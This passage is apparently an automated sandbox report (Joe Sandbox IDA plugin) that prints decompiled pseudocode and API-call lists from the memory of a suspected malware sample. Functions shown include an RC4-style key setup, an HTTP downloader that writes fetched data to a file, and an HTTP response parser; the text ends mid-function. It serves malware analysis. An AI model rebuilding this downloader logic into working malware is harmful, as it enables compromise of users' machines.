					_t25 = _t25 + ( *(_t41 + (_t12 & 0x00000003) + 0xc) & 0x000000ff) + (_t28 & 0x000000ff) & 0x000000ff;
					_t6 = _t25 + 0x3b89b0; // 0x0
					 *((char*)(_t12 + 0x3b89b0)) =  *_t6;
					_t12 = _t12 + 1;
					 *(_t25 + 0x3b89b0) = _t28;
				} while (_t12 != 0x100);
				 *0x3b89a0 =  *0x3b89a0 & 0x00000000;
				 *0x3b89a4 =  *0x3b89a4 & 0x00000000;
				__imp__#115(0x202,  &_v404);
				_t31 = LoadLibraryA("Advapi32.dll");
				 *0x3b89a8 = GetProcAddress(_t31, "MD5Init");
				 *0x3b89ac = GetProcAddress(_t31, "MD5Update");
				 *0x3b8ab8 = GetProcAddress(_t31, "MD5Final");
				 *0x3b8ab4 = GetProcAddress(_t31, "A_SHAInit");
				 *0x3b899c = GetProcAddress(_t31, "A_SHAUpdate");
				_t20 = GetProcAddress(_t31, "A_SHAFinal");
				 *0x3b8ab0 = _t20;
				return _t20;
			}













    0x003ae985
    0x003ae994
    0x003ae998
    0x003ae99f
    0x003ae99f
    0x003ae9a5
    0x003ae9a6
    0x003ae9aa
    0x003ae9ac
    0x003ae9ae
    0x003ae9ae
    0x003ae9ae
    0x003ae9c5
    0x003ae9cb
    0x003ae9d1
    0x003ae9d7
    0x003ae9d8
    0x003ae9de
    0x003ae9e2
    0x003ae9e9
    0x003ae9fa
    0x003aea11
    0x003aea21
    0x003aea2e
    0x003aea3b
    0x003aea48
    0x003aea55
    0x003aea5a
    0x003aea5e
    0x003aea67

    APIs
    • GetTickCount.KERNEL32(0000000E,00000001,003A03C4), ref: 003AE98E
    • WSAStartup.WS2_32(00000202,?), ref: 003AE9FA
    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 003AEA05
    • GetProcAddress.KERNEL32(00000000,MD5Init), ref: 003AEA19
    • GetProcAddress.KERNEL32(00000000,MD5Update), ref: 003AEA26
    • GetProcAddress.KERNEL32(00000000,MD5Final), ref: 003AEA33
    • GetProcAddress.KERNEL32(00000000,A_SHAInit), ref: 003AEA40
    • GetProcAddress.KERNEL32(00000000,A_SHAUpdate), ref: 003AEA4D
    • GetProcAddress.KERNEL32(00000000,A_SHAFinal), ref: 003AEA5A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003971D0, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 305time
    C-Code - Quality: 44%
    			E003971D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				int _v28;
				int _v32;
				char _v36;
				int _v40;
				char _v44;
				char _v72;
				signed int _v84;
				intOrPtr _v88;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed int _v124;
				void _v132;
				char _v852;
				signed int _t82;
				signed int _t83;
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t99;
				void* _t101;
				void* _t103;
				void* _t105;
				void* _t109;
				intOrPtr _t110;
				intOrPtr _t113;
				signed int _t115;
				intOrPtr _t117;
				char* _t118;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t123;
				char* _t161;
				signed int _t163;
				intOrPtr _t164;
				intOrPtr _t166;
				void* _t168;
				void* _t169;
				void* _t171;

				_v40 = 0;
				_v28 = 0;
				_t161 = 0;
				_v8 = 0;
				_t166 = 0;
				_v44 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_t82 = memset( &_v132, 0, 0x3c);
				_t169 = _t168 + 0xc;
				_t83 = _t82 | 0xffffffff;
				_v132 = 0x3c;
				_v124 = _t83;
				_v112 = _t83;
				_v84 = _t83;
				__imp__WinHttpCrackUrl(_a4, 0, 0,  &_v132, __edi, __esi, __ebx);
				if(_t83 == 0) {
					L46:
					_t84 = _v12;
					if(_v12 != 0) {
						E0039BB40(_t84);
					}
					return _v32;
				}
				_t87 = _v112;
				if(_v112 != 0 || _v84 != 0) {
					_t89 = E003A1D90(_t87 + _t87 + 2, 0);
					_t169 = _t169 + 8;
					_v16 = _t89;
					if(_t89 == 0) {
						goto L46;
					}
					_t90 = E003A1D90(_v84 + _v84 + 2, 0);
					_t171 = _t169 + 8;
					_v20 = _t90;
					_t176 = _t90;
					if(_t90 == 0) {
						L44:
						E0039BB40(_v16);
						_t92 = _v20;
						_t169 = _t171 + 4;
						if(_v20 != 0) {
							E0039BB40(_t92);
							_t169 = _t169 + 4;
						}
						goto L46;
					}
					E0039D620(_v16, _v112 + 1, _v116);
					E0039D620(_v20, _v84 + 1, _v88);
					_t99 = E003B1280(_t176, _v16);
					_t171 = _t171 + 4;
					_t177 = _t99;
					if(_t99 != 0) {
						L003B1DC0( &_v72);
						_t101 = E003B1B60( &_v72, _v16, 0x50);
						__eflags = _t101;
						if(_t101 != 0) {
							_t103 = E003B1B30(_v20,  &_v24);
							__eflags = _t103;
							if(_t103 != 0) {
								_v36 = 0;
								_t105 = E003B1C30( &_v72,  &_v12,  &_v36);
								__eflags = _t105;
								if(_t105 != 0) {
									__eflags = _v24 + 0xffffff38 - 0x1a;
									_t142 =  &_v72;
									if(_v24 + 0xffffff38 > 0x1a) {
										L28:
										E003B1730(_t142);
										goto L44;
									}
									_t166 = _v36;
									E003B1730( &_v72);
									L35:
									_t109 = E00391A80(_t142, _a8, _v12, _t166);
									_t171 = _t171 + 0xc;
									if(_t109 != 0) {
										_v32 = 1;
									}
									L37:
									if(_t161 != 0) {
										__imp__WinHttpCloseHandle(_t161);
									}
									L39:
									_t163 = _v28;
									L40:
									if(_t163 != 0) {
										__imp__WinHttpCloseHandle(_t163);
									}
									L42:
									_t110 = _v40;
									if(_t110 != 0) {
										__imp__WinHttpCloseHandle(_t110);
									}
									goto L44;
								}
								E003B1730( &_v72);
								goto L44;
							}
							E003B1730( &_v72);
							goto L44;
						}
						_t142 =  &_v72;
						goto L28;
					}
					_t113 = E00399090(_t177,  &_v852, 0x49);
					_t171 = _t171 + 8;
					__imp__WinHttpOpen( &_v852, 0, 0, 0, 0);
					_t164 = _t113;
					_v40 = _t164;
					if(_t164 == 0) {
						goto L44;
					}
					_t115 = _a12 * 0xea60;
					__imp__WinHttpSetTimeouts(_t164, 0x15f90, 0x15f90, 0x2bf20, _t115);
					__imp__WinHttpConnect(_t164, _v16, 0, 0);
					_t163 = _t115;
					_v28 = _t163;
					_t179 = _t163;
					if(_t163 == 0) {
						goto L42;
					}
					E00399090(_t179,  &_v852, 0x69);
					_t117 = _v120;
					_t171 = _t171 + 8;
					if(_t117 != 1) {
						__eflags = _t117 - 2;
						if(_t117 != 2) {
							goto L40;
						} else {
							_push(0x800000);
							_push(0);
							_push(0);
							_push(0);
							_push(_v20);
							_t118 =  &_v852;
							_push(_t118);
							goto L12;
						}
					} else {
						_t118 = _v20;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(_t118);
						_push( &_v852);
						L12:
						__imp__WinHttpOpenRequest(_t163);
						_t161 = _t118;
						if(_t161 == 0) {
							goto L39;
						}
						__imp__WinHttpSendRequest(_t161, 0, 0, 0, 0, 0, 0);
						if(_t118 == 0) {
							goto L37;
						}
						__imp__WinHttpReceiveResponse(_t161, 0);
						if(_t118 == 0) {
							goto L37;
						}
						_v8 = 4;
						__imp__WinHttpQueryHeaders(_t161, 0x20000013, 0,  &_v24,  &_v8, 0);
						if(_t118 == 0) {
							goto L37;
						}
						_t120 = _v24 + 0xffffff38;
						if(_t120 <= 0x1a) {
							while(1) {
								_t142 =  &_v8;
								_v8 = 0;
								__imp__WinHttpQueryDataAvailable(_t161,  &_v8);
								if(_t120 == 0) {
									goto L37;
								}
								_t121 = _v8;
								if(_t121 == 0) {
									goto L35;
								}
								_t166 = _t166 + _t121;
								_t122 = _v12;
								if(_v12 == 0) {
									_t120 = E003A1D90(_t166, 0);
									_t171 = _t171 + 8;
									_v12 = _t120;
								} else {
									_t123 = E003A1D90(_t166, _t122);
									_v12 = _t123;
									_t171 = _t171 + 8;
									_t120 = _t123 - _v8 + _t166;
								}
								_t142 = _v8;
								__imp__WinHttpReadData(_t161, _t120, _v8,  &_v44);
								if(_t120 == 0) {
									goto L37;
								} else {
									if(_v8 > 0) {
										continue;
									} else {
										goto L35;
									}
								}
							}
						}
						goto L37;
					}
				} else {
					goto L46;
				}
			}














































    0x003971e5
    0x003971e8
    0x003971eb
    0x003971ed
    0x003971f0
    0x003971f2
    0x003971f5
    0x003971f8
    0x003971fb
    0x003971fe
    0x00397206
    0x0039720e
    0x00397213
    0x0039721a
    0x0039721d
    0x00397220
    0x00397223
    0x0039722b
    0x00397515
    0x00397515
    0x0039751d
    0x00397520
    0x00397525
    0x0039752e
    0x0039752e
    0x00397231
    0x00397236
    0x00397247
    0x0039724c
    0x0039724f
    0x00397254
    0x00000000
    0x00000000
    0x00397263
    0x00397268
    0x0039726b
    0x0039726e
    0x00397270
    0x003974f9
    0x003974fd
    0x00397502
    0x00397505
    0x0039750a
    0x0039750d
    0x00397512
    0x00397512
    0x00000000
    0x0039750a
    0x00397283
    0x00397295
    0x0039729e
    0x003972a3
    0x003972a6
    0x003972a8
    0x0039743d
    0x0039744b
    0x00397450
    0x00397452
    0x0039746c
    0x00397474
    0x00397476
    0x00397487
    0x0039748a
    0x0039748f
    0x00397491
    0x003974a6
    0x003974a9
    0x003974ac
    0x00397457
    0x00397457
    0x00000000
    0x00397457
    0x003974ae
    0x003974b1
    0x003974b6
    0x003974bf
    0x003974c4
    0x003974c9
    0x003974cb
    0x003974cb
    0x003974d2
    0x003974d4
    0x003974d7
    0x003974d7
    0x003974dd
    0x003974dd
    0x003974e0
    0x003974e2
    0x003974e5
    0x003974e5
    0x003974eb
    0x003974eb
    0x003974f0
    0x003974f3
    0x003974f3
    0x00000000
    0x003974f0
    0x00397496
    0x00000000
    0x00397496
    0x00397478
    0x00000000
    0x00397478
    0x00397454
    0x00000000
    0x00397454
    0x003972b7
    0x003972bc
    0x003972ca
    0x003972d0
    0x003972d2
    0x003972d7
    0x00000000
    0x00000000
    0x003972e0
    0x003972f7
    0x00397304
    0x0039730a
    0x0039730c
    0x0039730f
    0x00397311
    0x00000000
    0x00000000
    0x00397320
    0x00397325
    0x00397328
    0x0039732e
    0x00397341
    0x00397344
    0x00000000
    0x0039734a
    0x0039734d
    0x00397352
    0x00397353
    0x00397354
    0x00397355
    0x00397356
    0x0039735c
    0x00000000
    0x0039735c
    0x00397330
    0x00397330
    0x00397333
    0x00397334
    0x00397335
    0x00397336
    0x00397337
    0x0039733e
    0x0039735d
    0x0039735e
    0x00397364
    0x00397368
    0x00000000
    0x00000000
    0x00397375
    0x0039737d
    0x00000000
    0x00000000
    0x00397385
    0x0039738d
    0x00000000
    0x00000000
    0x003973a3
    0x003973aa
    0x003973b2
    0x00000000
    0x00000000
    0x003973bb
    0x003973c3
    0x003973d0
    0x003973d0
    0x003973d5
    0x003973d8
    0x003973e0
    0x00000000
    0x00000000
    0x003973e6
    0x003973eb
    0x00000000
    0x00000000
    0x003973f1
    0x003973f3
    0x003973f8
    0x00397410
    0x00397415
    0x00397418
    0x003973fa
    0x003973fc
    0x00397401
    0x00397407
    0x0039740a
    0x0039740a
    0x0039741b
    0x00397425
    0x0039742d
    0x00000000
    0x00397433
    0x00397436
    0x00000000
    0x00397438
    0x00000000
    0x00397438
    0x00397436
    0x0039742d
    0x003973d0
    0x00000000
    0x003973c3
    0x00000000
    0x00000000
    0x00000000

    APIs
    • memset.MSVCRT ref: 003971FE
    • WinHttpCrackUrl.WINHTTP(?,00000000,00000000,?,?,003943BC,?), ref: 00397223
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003943BC,?), ref: 003972CA
    • WinHttpSetTimeouts.WINHTTP(00000000,00015F90,00015F90,0002BF20,0039D19E,?,?,?,?,?,?,?,?,003943BC,?), ref: 003972F7
    • WinHttpConnect.WINHTTP(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,003943BC,?), ref: 00397304
    • WinHttpOpenRequest.WINHTTP(00000000,?,0039D19E,00000000,00000000,00000000,00800000,?,?,?,?,?), ref: 0039735E
    • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00397375
    • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,?,?,?,?,?,?,?,003943BC,?), ref: 00397385
    • WinHttpQueryHeaders.WINHTTP(00000000,20000013,00000000,?,0000000C,00000000,?,?,?,?,?), ref: 003973AA
    • WinHttpQueryDataAvailable.WINHTTP(00000000,00000004,?,?,?,?,?,?,?,?,?,?,003943BC,?), ref: 003973D8
    • WinHttpReadData.WINHTTP(00000000,00000000,00000004,?,?,?,?,?,?,?,?), ref: 00397425
      • Part of subcall function 003B1C30: memcpy.MSVCRT ref: 003B1C65
      • Part of subcall function 00391A80: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
      • Part of subcall function 00391A80: WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    • WinHttpCloseHandle.WINHTTP(00000000,?,?,00000050,?,?,?,?,?,?,003943BC,?), ref: 003974D7
    • WinHttpCloseHandle.WINHTTP(?,?,?,00000050,?,?,?,?,?,?,003943BC,?), ref: 003974E5
    • WinHttpCloseHandle.WINHTTP(?,?,?,00000050,?,?,?,?,?,?,003943BC,?), ref: 003974F3
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B1820, Relevance: 21.3, APIs: 9, Strings: 5, Instructions: 258string
    C-Code - Quality: 100%
    			E003B1820(void* __ebx, intOrPtr* __ecx, void* _a4, char _a8, char _a10, char _a11, int _a12, char _a16, intOrPtr* _a20) {
				void* _v8;
				intOrPtr _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v44;
				char _v68;
				char _v196;
				intOrPtr _t81;
				void* _t82;
				void* _t83;
				void* _t85;
				void* _t88;
				char* _t101;
				int _t105;
				void* _t110;
				char* _t112;
				void* _t114;
				void* _t118;
				void* _t121;
				void* _t124;
				char _t131;
				void* _t132;
				char* _t134;
				void* _t136;
				intOrPtr _t140;
				intOrPtr _t143;
				intOrPtr _t144;
				char* _t147;
				intOrPtr _t149;
				char _t167;
				intOrPtr _t172;
				intOrPtr _t178;
				void* _t180;
				void* _t182;
				intOrPtr* _t183;
				void* _t184;
				void* _t185;
				void* _t187;
				void* _t188;
				void* _t189;

				_t183 = __ecx;
				_v12 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x20))))() == 0) {
					return 0;
				} else {
					_t81 =  *0x3b8628; // 0x593938
					_t180 = _a4;
					_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t81 + 0xc))))(_t180, __ebx);
					_t140 =  *0x3b8628; // 0x593938
					_v8 = _t82;
					_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xc))))(_a8);
					_t131 = _a16;
					if(_t83 + _v8 + _t131 + 0x400 >= 0x400) {
						_t143 =  *0x3b8628; // 0x593938
						_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t143 + 0xc))))(_t180);
						_t144 =  *0x3b8628; // 0x593938
						_t88 =  *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))(_a8) + _t131 + _t85 + 0x400;
					} else {
						_t88 = 0x400;
					}
					_t132 = E003A1D90(_t88, 0);
					_v8 = _t132;
					_t182 = E003A1D90(0x10000, 0);
					_t185 = _t184 + 0x10;
					if(_t182 == 0) {
						L27:
						__eflags = _t132;
						if(_t132 != 0) {
							E0039BB40(_t132);
							_t185 = _t185 + 4;
						}
					} else {
						_t193 = _t132;
						if(_t132 != 0) {
							E00396CB0( &_v196, 0xd1);
							E00396CB0( &_v24, 0xd2);
							E00396CB0( &_v16, 0xd3);
							E00399090(_t193,  &_v44, 0xd4);
							E00396CB0( &_v32, 0xd4);
							_t167 = _a8;
							_t187 = _t185 + 0x28;
							if(_t167 != 0) {
								_t147 = 0x3b33e8;
							} else {
								_t167 =  &_v44;
								_t147 = 0x3b33eb;
							}
							_t27 =  &_v24; // 0x397471
							_t101 = _t27;
							if(_a12 == 0) {
								_t101 =  &_v16;
							}
							wsprintfA(_t132,  &_v196, _t101, _a4,  *((intOrPtr*)(_t183 + 8)), _t147, _t167);
							E00396CB0( &_v68, 0xd5);
							_t105 = _a12;
							_t188 = _t187 + 0x24;
							if(_t105 != 0) {
								_t34 =  &_a16; // 0x397471
								_t178 =  *0x3b8628; // 0x593938
								memcpy( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x10c))))( *_t34) + _t132, _t132, _t105);
								_t188 = _t188 + 0xc;
							}
							while(1) {
								L14:
								_t149 =  *0x3b8628; // 0x593938
								_v12 = E003A6487( *((intOrPtr*)(_t183 + 4)), _t132,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 0x10c))))(_t132));
								memset(_t182, 0, 0x10000);
								_t189 = _t188 + 0x18;
								 *(_t183 + 0x14) = 0;
								while(1) {
									L15:
									_t110 = E003A64AC( *((intOrPtr*)(_t183 + 4)), _t182 +  *(_t183 + 0x14), 1);
									_t185 = _t189 + 0xc;
									if(_t110 == 0) {
										goto L27;
									}
									_t112 = strstr(_t182,  &_v32);
									_t188 = _t185 + 8;
									if(_t112 != 0) {
										L19:
										 *(_t183 + 0x18) =  *(_t183 + 0x14);
										_t172 =  *0x3b8628; // 0x593938
										_t114 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x10c))))(_t182);
										__eflags = _t114 - 0xc;
										if(_t114 <= 0xc) {
											L14:
											_t149 =  *0x3b8628; // 0x593938
											_v12 = E003A6487( *((intOrPtr*)(_t183 + 4)), _t132,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 0x10c))))(_t132));
											memset(_t182, 0, 0x10000);
											_t189 = _t188 + 0x18;
											 *(_t183 + 0x14) = 0;
											continue;
										} else {
											L20:
											_a8 =  *((intOrPtr*)(_t182 + 9));
											_a10 =  *((intOrPtr*)(_t182 + 0xb));
											_a11 = 0;
											 *_a20 = atoi( &_a8);
											_t134 = strstr(_t182,  &_v68);
											_t185 = _t188 + 0xc;
											__eflags = _t134;
											if(_t134 == 0) {
												L26:
												_t132 = _v8;
											} else {
												_t118 = strstr(_t134, 0x3b33e8);
												_t188 = _t185 + 8;
												_a4 = _t118;
												__eflags = _t118;
												if(_t118 == 0) {
													L13:
													_t132 = _v8;
													do {
														goto L14;
													} while (_t114 <= 0xc);
													goto L20;
												} else {
													 *_t118 = 0;
													_t136 = atoi( &(_t134[0x10]));
													_t188 = _t188 + 4;
													 *_a4 = 0xd;
													__eflags = _t136;
													if(_t136 == 0) {
														goto L13;
													} else {
														_t121 = E003A1D90( *(_t183 + 0x14) + _t136 + 2, 0);
														_t185 = _t188 + 8;
														 *(_t183 + 0x10) = _t121;
														__eflags = _t121;
														if(_t121 != 0) {
															memcpy(_t121, _t182,  *(_t183 + 0x14) + 1);
															_t124 = E003A64AC( *((intOrPtr*)(_t183 + 4)),  *(_t183 + 0x10) +  *(_t183 + 0x14) + 1, _t136);
															_t185 = _t185 + 0x18;
															__eflags = _t124;
															if(_t124 != 0) {
																_t71 = _t183 + 0x14;
																 *_t71 =  *(_t183 + 0x14) + _t136 + 1;
																__eflags =  *_t71;
																 *((char*)( *(_t183 + 0x10) +  *(_t183 + 0x14))) = 0;
																_v12 = 1;
															}
														}
														goto L26;
													}
												}
											}
										}
									} else {
										 *(_t183 + 0x14) =  *(_t183 + 0x14) + 1;
										if( *(_t183 + 0x14) < 0x10000) {
											continue;
										} else {
											while(1) {
												L14:
												_t149 =  *0x3b8628; // 0x593938
												_v12 = E003A6487( *((intOrPtr*)(_t183 + 4)), _t132,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 0x10c))))(_t132));
												memset(_t182, 0, 0x10000);
												_t189 = _t188 + 0x18;
												 *(_t183 + 0x14) = 0;
												goto L15;
											}
										}
										goto L29;
									}
									goto L27;
								}
								goto L27;
							}
						}
					}
					L29:
					__eflags = _t182;
					if(_t182 != 0) {
						E0039BB40(_t182);
					}
					return _v12;
				}
			}












































    0x003b182a
    0x003b1834
    0x003b183b
    0x003b1b2a
    0x003b1841
    0x003b1841
    0x003b1846
    0x003b184e
    0x003b1853
    0x003b185d
    0x003b1860
    0x003b1862
    0x003b1876
    0x003b187f
    0x003b1889
    0x003b188b
    0x003b189d
    0x003b1878
    0x003b1878
    0x003b1878
    0x003b18ac
    0x003b18b5
    0x003b18bd
    0x003b18bf
    0x003b18c4
    0x003b1afd
    0x003b1afd
    0x003b1aff
    0x003b1b02
    0x003b1b07
    0x003b1b07
    0x003b18ca
    0x003b18ca
    0x003b18cc
    0x003b18de
    0x003b18ec
    0x003b18fa
    0x003b1908
    0x003b1916
    0x003b191b
    0x003b191e
    0x003b1923
    0x003b198b
    0x003b1925
    0x003b1925
    0x003b1928
    0x003b1928
    0x003b1931
    0x003b1931
    0x003b1934
    0x003b1936
    0x003b1936
    0x003b194c
    0x003b195b
    0x003b1960
    0x003b1963
    0x003b1968
    0x003b196a
    0x003b196d
    0x003b1981
    0x003b1986
    0x003b1986
    0x003b19a3
    0x003b19a3
    0x003b19a3
    0x003b19c5
    0x003b19c8
    0x003b19cd
    0x003b19d0
    0x003b19d7
    0x003b19d7
    0x003b19e3
    0x003b19e8
    0x003b19ed
    0x00000000
    0x00000000
    0x003b19f8
    0x003b19fe
    0x003b1a03
    0x003b1a13
    0x003b1a16
    0x003b1a19
    0x003b1a26
    0x003b1a28
    0x003b1a2b
    0x003b19a3
    0x003b19a3
    0x003b19c5
    0x003b19c8
    0x003b19cd
    0x003b19d0
    0x00000000
    0x003b1a31
    0x003b1a31
    0x003b1a3c
    0x003b1a40
    0x003b1a43
    0x003b1a55
    0x003b1a5d
    0x003b1a5f
    0x003b1a62
    0x003b1a64
    0x003b1afa
    0x003b1afa
    0x003b1a6a
    0x003b1a70
    0x003b1a76
    0x003b1a79
    0x003b1a7c
    0x003b1a7e
    0x003b19a0
    0x003b19a0
    0x003b19a3
    0x00000000
    0x00000000
    0x00000000
    0x003b1a84
    0x003b1a88
    0x003b1a91
    0x003b1a96
    0x003b1a99
    0x003b1a9c
    0x003b1a9e
    0x00000000
    0x003b1aa4
    0x003b1aae
    0x003b1ab3
    0x003b1ab6
    0x003b1ab9
    0x003b1abb
    0x003b1ac4
    0x003b1ad9
    0x003b1ade
    0x003b1ae1
    0x003b1ae3
    0x003b1ae9
    0x003b1ae9
    0x003b1ae9
    0x003b1aef
    0x003b1af3
    0x003b1af3
    0x003b1ae3
    0x00000000
    0x003b1abb
    0x003b1a9e
    0x003b1a7e
    0x003b1a64
    0x003b1a05
    0x003b1a05
    0x003b1a0f
    0x00000000
    0x003b1a11
    0x003b19a3
    0x003b19a3
    0x003b19a3
    0x003b19c5
    0x003b19c8
    0x003b19cd
    0x003b19d0
    0x00000000
    0x003b19d0
    0x003b19a3
    0x00000000
    0x003b1a0f
    0x00000000
    0x003b1a03
    0x00000000
    0x003b19d7
    0x003b19a3
    0x003b18cc
    0x003b1b0a
    0x003b1b0b
    0x003b1b0d
    0x003b1b10
    0x003b1b15
    0x003b1b20
    0x003b1b20

    APIs
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • wsprintfA.USER32 ref: 003B194C
    • memcpy.MSVCRT ref: 003B1981
    • memset.MSVCRT ref: 003B19C8
    • strstr.MSVCRT ref: 003B19F8
    • atoi.MSVCRT ref: 003B1A47
    • strstr.MSVCRT ref: 003B1A57
    • strstr.MSVCRT ref: 003B1A70
    • atoi.MSVCRT ref: 003B1A8B
    • memcpy.MSVCRT ref: 003B1AC4
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A4BDF, Relevance: 19.7, APIs: 8, Strings: 5, Instructions: 174string
    C-Code - Quality: 76%
    			E003A4BDF(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char* _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				int _v68;
				void _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t53;
				intOrPtr* _t55;
				void* _t57;
				void* _t62;
				void* _t77;
				void* _t78;
				intOrPtr _t82;
				void* _t90;
				intOrPtr _t106;
				int _t111;
				char* _t112;
				intOrPtr _t113;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t123;

				_t53 =  *0x3b8538(0x400);
				_v8 = _t53;
				_v16 =  *0x3b8538(0x400);
				_t55 = _a8;
				_t90 = _t55 + 1;
				do {
					_t106 =  *_t55;
					_t55 = _t55 + 1;
				} while (_t106 != 0);
				_t57 = E003A463A(_a4, 0, _a8, _t55 - _t90);
				_t119 = _t118 + 0xc;
				if(_t57 == 0) {
					L7:
					_t111 = 0;
				} else {
					memset(_v8, 0, 0x400);
					_t120 = _t119 + 0xc;
					_v12 = _v12 & 0x00000000;
					while(1) {
						_t85 = _a4;
						_t62 = E003A48F6(_a4, 0,  &(_v8[_v12]), 1);
						_t120 = _t120 + 0xc;
						if(_t62 == 0) {
							goto L7;
						}
						if(strstr(_v8, 0x3b667c) != 0) {
							if(strstr(_v8, "200 OK") == 0) {
								goto L7;
							} else {
								if(strstr(_v8, "Content-Encoding: deflate") == 0) {
									_t112 = "Content-Length: ";
									if(strstr(_v8, _t112) == 0) {
										goto L7;
									} else {
										_v12 = _v12 & 0x00000000;
										sscanf( &((strstr(_v8, _t112))[0x10]), "%d\r\n",  &_v12);
										if(_v12 == 0) {
											goto L7;
										} else {
											_t113 = _a12;
											if(E003A48F6(_t85, 0, _t113, _v12) == 0) {
												goto L7;
											} else {
												 *((char*)(_v12 + _t113)) = 0;
												goto L26;
											}
										}
									}
								} else {
									memset( &_v72, 0, 0x38);
									_v72 = _v16;
									_v68 = 0;
									_v60 = _a12;
									_v56 = 0x400000;
									E003A2307( &_v72);
									_t87 = _a4;
									_t77 = E003A48F6(_a4, 0, _v16, 1);
									_t123 = _t120 + 0x18;
									while(_t77 != 0) {
										if(_v68 == 0) {
											_v72 = _v16;
											_v68 = 1;
										}
										_t78 = E003A238B( &_v72);
										if(_t78 == 1) {
											L21:
											 *((char*)(_v52 + _a12)) = 0;
											E003A255C( &_v72);
											L26:
											_t111 = 1;
										} else {
											if(_t78 != 0) {
												E003A255C( &_v72);
												goto L7;
											} else {
												_t82 = _a16;
												if(_t82 == 0 || _v64 < _t82) {
